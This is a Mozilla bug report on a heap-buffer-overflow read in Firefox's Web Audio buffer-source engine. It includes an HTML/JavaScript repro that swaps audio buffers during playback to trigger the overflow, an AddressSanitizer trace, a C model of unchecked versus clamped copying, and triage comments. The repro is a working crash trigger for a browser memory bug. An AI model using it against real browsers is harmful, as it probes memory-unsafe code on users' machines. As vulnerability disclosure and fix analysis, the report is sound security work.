Bug 874915
Opened 11 years ago
Closed 11 years ago
Heap-buffer-overflow READ in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer
Categories: Core :: Web Audio, defect
Status: RESOLVED FIXED
Target Milestone: mozilla24
Branch | Tracking | Status
---|---|---
firefox21 | --- | unaffected |
firefox22 | + | disabled |
firefox23 | + | disabled |
firefox24 | + | fixed |
firefox-esr17 | --- | unaffected |
b2g18 | --- | unaffected |
People
(Reporter: attekett, Assigned: ehsan.akhgari)
(4 keywords, Whiteboard: [asan][adv-main24-])
Attachments (2 files):
(deleted), text/html
(deleted), patch, roc: review+
Tested on:
OS: Ubuntu 12.04
Firefox: ASAN opt-build 24.0a1 from
https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1369217427/
Repro-case:
<script>
var Context0 = new AudioContext();
var BufferSource6 = Context0.createBufferSource();
// From the main thread, keep swapping a short (11283-frame) buffer into the node
// while the graph thread is rendering it.
setInterval(function () {
  BufferSource6.buffer = function () {
    var length = 11283;
    var Buffer = Context0.createBuffer(1, length, Context0.sampleRate);
    var bufferData = Buffer.getChannelData(0);
    for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i * 624); }
    return Buffer;
  }();
}, 0);
// start(when, offset, duration), all in seconds. At 44.1/48 kHz, offset + duration
// (about 0.765 s) lies well past the end of the 11283-frame buffer (about 0.25 s).
BufferSource6.start(0.15831333969254047, 0.23571860056836158, 0.529235512483865);
// The long (48517-frame) buffer is attached before the timer first fires.
BufferSource6.buffer = function () {
  var length = 48517;
  var Buffer = Context0.createBuffer(1, length, Context0.sampleRate);
  var bufferData = Buffer.getChannelData(0);
  for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i * 365); }
  return Buffer;
}();
</script>
ASAN-report:
==31496== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f44ca227118 at pc 0x7f44f856318d bp 0x7f44d0c10070 sp 0x7f44d0c10068
READ of size 1 at 0x7f44ca227118 thread T26
#0 0x7f44f856318c in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer(mozilla::AudioChunk*, unsigned int, unsigned long, unsigned long, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:172
#1 0x7f44f856171f in mozilla::dom::AudioBufferSourceNodeEngine::ProduceAudioBlock(mozilla::AudioNodeStream*, mozilla::AudioChunk const&, mozilla::AudioChunk*, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:392
#2 0x7f44f84d117e in mozilla::AudioNodeStream::ProduceOutput(long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/AudioNodeStream.cpp:411
#3 0x7f44f853ec83 in mozilla::MediaStreamGraphImpl::ProduceDataForStreamsBlockByBlock(unsigned int, long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:937
#4 0x7f44f8550e05 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:1163
#5 0x7f44fabe2212 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
.
.
.
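The reporter's test case is worth reading arithmetically. At 44100 Hz the start() call's offset and duration are about 10395 and 23339 frames, so the engine expects to read up to roughly frame 33734: inside the 48517-frame buffer attached when playback was scheduled, but far beyond the end of the 11283-frame buffer the timer keeps swapping in. Any copy that trusts the position and end computed against the first buffer then reads past the second one. The following C model is an added example written for this page, not Gecko code and not the patch attached to this bug (the analysis lives in bug 874934 and is not reproduced here); the struct and function names, the 128-frame block size, the 4-blocks-before-swap timing and the 44100 Hz sample rate are assumptions. It renders the repro's numbers through an unchecked copy before the swap and a clamped copy after it, and counts how many blocks the unchecked copy would have read out of bounds.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Constructed model of the bug class in this report; not Gecko code. Web Audio
 * renders in 128-frame blocks on the graph thread while the main thread may
 * replace AudioBufferSourceNode.buffer at any time. */
#define BLOCK_SIZE 128u

typedef struct {
    float *data;
    uint32_t length;            /* frames in this buffer */
} AudioBuffer;

typedef struct {
    const AudioBuffer *buffer;  /* currently attached buffer; swappable */
    uint32_t position;          /* next frame to read */
    uint32_t end;               /* offset + duration in frames, fixed at start() */
} SourceState;

/* UNSAFE: trusts that [position, position + frames) lies inside the attached
 * buffer. True only for the buffer the bounds were validated against. */
static void copy_unchecked(float *out, const SourceState *s, uint32_t frames)
{
    memcpy(out, s->buffer->data + s->position, frames * sizeof(float));
}

/* HARDENED: clamp to the buffer attached now, zero-fill the remainder.
 * Returns the number of frames actually taken from the buffer. */
static uint32_t copy_clamped(float *out, const SourceState *s, uint32_t frames)
{
    uint32_t avail = s->position < s->buffer->length
                   ? s->buffer->length - s->position : 0;
    uint32_t n = frames < avail ? frames : avail;
    if (n)
        memcpy(out, s->buffer->data + s->position, n * sizeof(float));
    if (n < frames)
        memset(out + n, 0, (frames - n) * sizeof(float));
    return n;
}

/* Would the unchecked copy read past the attached buffer on this block? */
static int block_would_overflow(const SourceState *s, uint32_t frames)
{
    return (uint64_t)s->position + frames > s->buffer->length;
}

/* Frames to render this block: a full block, or what is left before end. */
static uint32_t frames_this_block(const SourceState *s)
{
    if (s->position >= s->end)
        return 0;
    uint32_t left = s->end - s->position;
    return left < BLOCK_SIZE ? left : BLOCK_SIZE;
}

typedef struct {
    uint32_t overflow_blocks;    /* blocks on which copy_unchecked would read OOB */
    uint32_t frames_from_buffer; /* frames copy_clamped took from the buffer after the swap */
    uint32_t frames_silenced;    /* frames copy_clamped zero-filled after the swap */
} SwapResult;

/* Validate offset/duration against `first`, render a few blocks, then attach
 * `second` without touching position/end (as the buffer setter does) and
 * render to the end with the clamped copy, counting what would have gone wrong. */
static SwapResult simulate_swap(const AudioBuffer *first, const AudioBuffer *second,
                                uint32_t blocks_before_swap, double offset_s,
                                double duration_s, double sample_rate)
{
    SourceState s;
    s.buffer = first;
    s.position = (uint32_t)(offset_s * sample_rate);
    s.end = s.position + (uint32_t)(duration_s * sample_rate);
    if (s.end > first->length)          /* bounds checked against `first` only */
        s.end = first->length;

    float out[BLOCK_SIZE];
    SwapResult r = {0, 0, 0};
    uint32_t n;
    for (uint32_t b = 0; b < blocks_before_swap && (n = frames_this_block(&s)) > 0; b++) {
        copy_unchecked(out, &s, n);     /* safe here: still inside `first` */
        s.position += n;
    }
    s.buffer = second;                  /* main-thread buffer swap */
    while ((n = frames_this_block(&s)) > 0) {
        if (block_would_overflow(&s, n))
            r.overflow_blocks++;
        uint32_t got = copy_clamped(out, &s, n);
        r.frames_from_buffer += got;
        r.frames_silenced += n - got;
        s.position += n;
    }
    return r;
}

/* Constructed sample data standing in for the repro's Math.sin() fill. */
static AudioBuffer make_buffer(uint32_t length)
{
    AudioBuffer b = { calloc(length, sizeof(float)), length };
    for (uint32_t i = 0; i < length; i++)
        b.data[i] = (float)(i % 97) / 97.0f;
    return b;
}

/* The repro's numbers: 48517 frames at start, 11283 frames swapped in, the
 * start() call's offset/duration, 44100 Hz assumed; swap=0 keeps the long buffer. */
static SwapResult repro_model(int swap)
{
    AudioBuffer first = make_buffer(48517), second = make_buffer(11283);
    SwapResult r = simulate_swap(&first, swap ? &second : &first, 4,
                                 0.23571860056836158, 0.529235512483865, 44100.0);
    free(first.data);
    free(second.data);
    return r;
}

int main(void)
{
    SwapResult r = repro_model(1);
    printf("blocks that would read out of bounds: %u, frames silenced by clamping: %u\n",
           r.overflow_blocks, r.frames_silenced);
    return 0;
}
```

With the swap, 177 of the 179 blocks rendered after it would read past the 11283-frame buffer; without the swap every frame comes from inside the buffer. The clamp-at-copy-time shape is one way to close this class of bug (the check must be against the buffer in hand, not the one start() saw); the other is to invalidate or recompute position and end whenever the buffer is replaced.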
Updated•11 years ago
OS: Linux → All
Comment 1•11 years ago
Updated•11 years ago
Attachment #752781 - Attachment mime type: text/plain → text/html
Comment 3•11 years ago
For the analysis, see bug 874934.
Comment 4•11 years ago
Attachment #752894 - Flags: review?(roc) → review+
Comment 5•11 years ago
Comment 6•11 years ago
Triaging with Ehsan, affects 22 through 24.
status-firefox21: --- → unaffected
status-firefox22: --- → affected
status-firefox23: --- → affected
status-firefox24: --- → affected
tracking-firefox22: --- → ?
tracking-firefox23: --- → ?
tracking-firefox24: --- → ?
Updated•11 years ago
Comment 7•11 years ago
Status: ASSIGNED → RESOLVED
Closed: 11 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla24
Updated•11 years ago
Flags: sec-bounty?
Comment 8•11 years ago
WebAudio is disabled in Firefox 22 and 23, correct?
Flags: sec-bounty? → sec-bounty+
Comment 9•11 years ago
This should have gone through sec-approval before going in if it isn't disabled based on earlier comments and the rating.
https://wiki.mozilla.org/Security/Bug_Approval_Process
We'll need to take this on Aurora and Beta now to make sure we don't ship it if it isn't disabled by default. Please nominate patches for those branches. What are the risks associated with doing so? Will the existing patch apply?
Whiteboard: [asan]
Comment 10•11 years ago
(In reply to Daniel Veditz [:dveditz] from comment #9)
> WebAudio is disabled in Firefox 22 and 23, correct?
Like all Web Audio bugs, it affects trunk, and 23, until 23 goes to beta.
(In reply to Al Billings [:abillings] from comment #10)
> We'll need to take this on Aurora and Beta now to make sure we don't ship it
> if it isn't disabled by default. Please nominate patches for those branches.
> What are the risks associated with doing so? Will the existing patch apply?
This is not needed on Beta since Web Audio is disabled there. And it will be disabled on 23 once it gets to release. Most if not all of these security bugs are relatively low-risk but there is some effort involved in uplifting them all to Aurora, and I'm not sure if we need to do that since we know that 23 will not ship Web Audio...
Comment 11•11 years ago
Mass moving Web Audio bugs to the Web Audio component. Filter on duckityduck.
Component: Video/Audio → Web Audio
Updated•11 years ago
status-firefox-esr17: --- → unaffected
Updated•11 years ago
Attachment #757679 - Attachment description: Bounty Awarded $3000 → Bounty Awarded $3000 [paid] 6/6/13
Updated•11 years ago
Whiteboard: [asan] → [asan][adv-main24-]
Updated•11 years ago
status-b2g18: --- → unaffected
Updated•11 years ago
Flags: in-testsuite?
Updated•11 years ago
Flags: in-testsuite? → in-testsuite+
Updated•11 years ago
Group: core-security
Updated•8 years ago
Keywords: csectype-bounds